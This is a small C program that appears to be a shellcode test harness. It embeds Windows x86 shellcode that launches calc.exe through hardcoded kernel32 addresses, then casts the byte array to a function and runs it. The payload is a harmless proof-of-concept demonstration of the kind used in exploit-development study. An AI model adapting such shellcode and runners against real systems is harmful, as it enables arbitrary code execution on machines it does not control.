
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int getchar () ;
 int printf (char*,int) ;
 int strlen (char*) ;
 void stub1 () ;

int main() {
char shell[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb"
"\x8d\x15\x86\x7c\xff\xd3\x31\xc0"
"\x50\xbb\xea\xcd\x81\x7c\xff\xd3"
"\xe8\xe5\xff\xff\xff\x63\x61\x6c"
"\x63\x2e\x65\x78\x65";
printf("Shellcode lenght %d\n", strlen(shell));
getchar();
((void (*)()) shell)();
return 0;
}
